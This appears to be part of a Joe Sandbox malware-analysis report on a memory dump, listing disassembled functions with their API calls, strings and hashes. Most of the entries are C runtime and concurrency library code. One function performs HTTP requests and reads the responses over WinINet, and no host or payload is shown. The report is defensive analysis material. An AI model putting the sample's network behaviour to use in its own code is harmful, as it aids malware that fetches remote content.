Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 001028B0
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 001028BD
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0010290B
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 001029B3
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 001029E5

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 4f29292f7c62540c3deb8daea25f13a5e7d40a703dc8260c1af12d0be2c04971
Instruction ID: 299b9401fbbfc2d961f0fb4bd55ccfe3c88eed8ad38e412ed5dbbe75504fe74a
Opcode Fuzzy Hash: 4f29292f7c62540c3deb8daea25f13a5e7d40a703dc8260c1af12d0be2c04971
Instruction Fuzzy Hash: 9871B230A0025AAFDF15DF54C988BBE7BB5AF55308F044098FC816B2D2CBB59D15DB61

Function 001051B5 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 001052B0
type_info::operator==.LIBVCRUNTIME ref: 001052D7
___TypeMatch.LIBVCRUNTIME ref: 001053E3
IsInExceptionSpec.LIBVCRUNTIME ref: 001054BE
_UnwindNestedFrames.LIBCMT ref: 00105545
CallUnexpected.LIBVCRUNTIME ref: 00105560

Strings

csm, xrefs: 0010525D
csm, xrefs: 0010530E
csm, xrefs: 001051F0

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: d4bd660d0e8d7bb3eb48d7eb735c4535747e6f944d05df67af91acfec32703d3
Instruction ID: d8d0ab8c18c52cf76c646e14b5be47d03a2e631b1d61a8850a6df5bff11bb83e
Opcode Fuzzy Hash: d4bd660d0e8d7bb3eb48d7eb735c4535747e6f944d05df67af91acfec32703d3
Instruction Fuzzy Hash: 32C19D71900A19DFCF15DF94C8859AFBBB6BF18311F04415AF890AB282D7B1DA91CF91

Function 000F68EA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 000F692F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 000F6961
List.LIBCONCRT ref: 000F699C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 000F69AD
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 000F69C9
List.LIBCONCRT ref: 000F6A04
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 000F6A15
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 000F6A30
List.LIBCONCRT ref: 000F6A6B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 000F6A78

Part of subcall function 000F5DEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 000F5E07
Part of subcall function 000F5DEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 000F5E19

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction ID: 0f1d633c623c4a43a5fea4d5b6a61576fc3497da16ce6939287bb34e0a82c044
Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
Instruction Fuzzy Hash: 0D513E71A0021DABDB04DF64C495BFDB3E8FF48304F044069EA55AB642DB75AE45DF90

Function 0010A3F9 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0010A40F

Part of subcall function 0010AC95: HeapFree.KERNEL32(00000000,00000000,?,0010EF6D,?,00000000,?,?,?,0010EF94,?,00000007,?,?,0010F396,?), ref: 0010ACAB
Part of subcall function 0010AC95: GetLastError.KERNEL32(?,?,0010EF6D,?,00000000,?,?,?,0010EF94,?,00000007,?,?,0010F396,?,?), ref: 0010ACBD

_free.LIBCMT ref: 0010A41B
_free.LIBCMT ref: 0010A426
_free.LIBCMT ref: 0010A431
_free.LIBCMT ref: 0010A43C
_free.LIBCMT ref: 0010A447
_free.LIBCMT ref: 0010A452
_free.LIBCMT ref: 0010A45D
_free.LIBCMT ref: 0010A468
_free.LIBCMT ref: 0010A476

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1544cb8fad76320969aa7c9682b51552f2129678c65250e64dcc74539fab2a55
Instruction ID: ac908abc687890222f8e28f32bfdd0d9b5d729bc6676553570ac32828640ee0d
Opcode Fuzzy Hash: 1544cb8fad76320969aa7c9682b51552f2129678c65250e64dcc74539fab2a55
Instruction Fuzzy Hash: 6A21F87690020CAFCB02EF94C985CDE7BB9BF18340F424465F5459F161DB71EA488B81

Function 000F7274 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 000F72C0
SwitchToThread.KERNEL32(?), ref: 000F72E3
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 000F7302
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 000F731E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 000F7329
std::invalid_argument::invalid_argument.LIBCONCRT ref: 000F7350

Strings

ppVirtualProcessorRoots, xrefs: 000F7348
count, xrefs: 000F728E

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: dc8f896e80db0d1582dd494d1f168f59ead3b1ddad08daf8956bb4c34020a683
Instruction ID: e0828837c8d7ef1db9f1e32bae45466b0c6479d8c89111947fe328a625a532c5
Opcode Fuzzy Hash: dc8f896e80db0d1582dd494d1f168f59ead3b1ddad08daf8956bb4c34020a683
Instruction Fuzzy Hash: 97217134A0020DAFCB14EF95C5859BDB7B5BF48340F144069EA05A7662DB30AE11EB51

Function 000F6D2C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000F6D46
GetCurrentProcess.KERNEL32 ref: 000F6D4E
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 000F6D63
SafeRWList.LIBCONCRT ref: 000F6D83

Part of subcall function 000F4D7E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 000F4D8F
Part of subcall function 000F4D7E: List.LIBCMT ref: 000F4D99

std::invalid_argument::invalid_argument.LIBCONCRT ref: 000F6D95
GetLastError.KERNEL32 ref: 000F6DA4
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 000F6DBA

Strings

eventObject, xrefs: 000F6D8D

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: 63a050d7674b92c8579aebb3cd97e9be11819c49f28efb9afb5ed11cff29fb35
Instruction ID: d36225cccad9205a93ce54319567c3c40fb78c8fd6a381152b5517baac1a721b
Opcode Fuzzy Hash: 63a050d7674b92c8579aebb3cd97e9be11819c49f28efb9afb5ed11cff29fb35
Instruction Fuzzy Hash: 7411C231A00218FBDB64EBA0DC4AFFE37A8AF04710F600155B605A68D2EB749A54DB65

Function 000DBD82 Relevance: 13.8, APIs: 9, Instructions: 341networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00128D20,00000000,00000000,00000000,00000000), ref: 000DBDBC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 000DBDE0
HttpOpenRequestA.WININET(?,00000000), ref: 000DBE2A
HttpSendRequestA.WININET(?,00000000), ref: 000DBEEA
InternetReadFile.WININET(?,?,000003FF,?), ref: 000DBF9C
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 000DC050
InternetCloseHandle.WININET(?), ref: 000DC077
InternetCloseHandle.WININET(?), ref: 000DC07F
InternetCloseHandle.WININET(?), ref: 000DC087

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
String ID:
API String ID: 1354133546-0
Opcode ID: 202cc99a31e78b52a69483c06262624a375793c646138968dcb7d49ef3b4564e
Instruction ID: 33d95fa1a9bdf5ed56bdc35ca0a4fc9a1530be4a3044b0bcc248e3503ed43b7a
Opcode Fuzzy Hash: 202cc99a31e78b52a69483c06262624a375793c646138968dcb7d49ef3b4564e
Instruction Fuzzy Hash: 84C1C3B1600259DBEB28DF24CC88BED7B75EF45304F50819AF50897292D7759AC0CFA5

Function 00115572 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1c9f53279a829f32dcef6206723c304a489f7c86561255d6b26d451adc8ba4
Instruction ID: d6504c8b29662a394194a1d760b787682b69b3d6b36214dff848e7a87ad350ec
Opcode Fuzzy Hash: 0b1c9f53279a829f32dcef6206723c304a489f7c86561255d6b26d451adc8ba4
Instruction Fuzzy Hash: 8FC12270E04A48EFDB19CF99D881BEDBBB6AF88314F504068E541AB292C7709981CF61

Function 000F77F1 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 000F7813

Part of subcall function 000F5BC8: __EH_prolog3_catch.LIBCMT ref: 000F5BCF
Part of subcall function 000F5BC8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 000F5C08

Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 000F7821

Part of subcall function 000F682D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 000F6852
Part of subcall function 000F682D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 000F6875

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 000F783A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 000F7846

Part of subcall function 000F5BC8: RtlInterlockedPopEntrySList.NTDLL(?), ref: 000F5C51
Part of subcall function 000F5BC8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 000F5C80
Part of subcall function 000F5BC8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 000F5C8E

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 000F7892
Concurrency::location::_Assign.LIBCMT ref: 000F78B3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 000F78BB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 000F78CD
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 000F78FD

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: bd5405506751ffdba3a86c1cf6ef1d72f263655fb444f71db886dc7e3d0930ee
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 5E314730B4C25D5BCF56AA784896AFE7BF55F41340F0401A9D64AD7643DB244C4AE393

Function 00100895 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 001008AB
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,000F5BBE,?), ref: 001008BD
GetCurrentThread.KERNEL32 ref: 001008C5
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,000F5BBE,?), ref: 001008CD
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,000F5BBE,?), ref: 001008E6
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00100907

Part of subcall function 000F0121: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 000F013B

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,000F5BBE,?), ref: 00100919
GetLastError.KERNEL32(?,?,?,?,?,000F5BBE,?), ref: 00100944
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0010095A

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 6e8487022be81f1399ed80f73cb6b4e84f173484b9e1e1be5a1e619df82232f1
Instruction ID: b0c362da0a7a670a3b513ec479f66019d6867d1212c9c5ef274056c4f70ae4a2
Opcode Fuzzy Hash: 6e8487022be81f1399ed80f73cb6b4e84f173484b9e1e1be5a1e619df82232f1
Instruction Fuzzy Hash: 0911E771600305BBE722AB749C4AFAA3BA8AF1D700F044135F9C9D6593EBB0C550CB75

Function 0010B01D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 0010B074
G!, xrefs: 0010B0B7, 0010B0AD
ext-ms-, xrefs: 0010B088

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: G!$api-ms-$ext-ms-
API String ID: 0-1229130774
Opcode ID: 808d934168f7ed4ec804adf1c37f8b57af16f959acda935d0c5ec40ed197a9c9
Instruction ID: fe455468a32207844ae9dc6e605faa35094c847fa94b9c5f1584d7acc7563ee1
Opcode Fuzzy Hash: 808d934168f7ed4ec804adf1c37f8b57af16f959acda935d0c5ec40ed197a9c9
Instruction Fuzzy Hash: 1721C375A49224FBCB324B249CC5A2B76789F04760F220621F8A5A72D5D7B0DD0186E0

Function 0010E92E Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0010E958
_free.LIBCMT ref: 0010EA31
_free.LIBCMT ref: 0010EA5E

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 9ec18e62dadc74a469c399dadd8e763df55abac8792900fbc772336713cdead6
Instruction ID: 1e7adac5e428a0a5723da7d329b5e3ba387afa8a2ae56dd9403d3800125e00f3
Opcode Fuzzy Hash: 9ec18e62dadc74a469c399dadd8e763df55abac8792900fbc772336713cdead6
Instruction Fuzzy Hash: 67515971E04305AFEB25AFB69841B6DBBF5AF05310F084969F5D19B2C2EBF18940CB61

Function 00104750 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00104787
___except_validate_context_record.LIBVCRUNTIME ref: 0010478F
_ValidateLocalCookies.LIBCMT ref: 00104818
__IsNonwritableInCurrentImage.LIBCMT ref: 00104843
_ValidateLocalCookies.LIBCMT ref: 00104898

Strings

csm, xrefs: 0010482D

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 790007c5dce828b3069afa57645f3c32d1ddbaf0547e6e9977d822fc209761e6
Instruction ID: 5d7faccf5b24be6406a6858d6c844e2c43f025579559ce765732c0f5f8585555
Opcode Fuzzy Hash: 790007c5dce828b3069afa57645f3c32d1ddbaf0547e6e9977d822fc209761e6
Instruction Fuzzy Hash: CB410674A00248ABCF14DFA8C8C4A9EBBB5FF49314F14C056EA545B3D2D7B1AA51CFA0

Function 00101A36 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00101A4F

Part of subcall function 00101D1E: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00101797), ref: 00101D2E

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00101A64
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00101A73
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00101B37

Strings

pContext, xrefs: 00101B2F
switchState, xrefs: 00101A6B

Memory Dump Source

Source File: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000009.00000002.2177703176.00000000000D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177781356.0000000000120000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177810745.0000000000132000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177834259.0000000000134000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2177998834.0000000000135000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.2178046887.0000000000139000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: 6e4554985036582841ba5059986901691cd6e61d5b0cf65bf5a53065cc6a1827
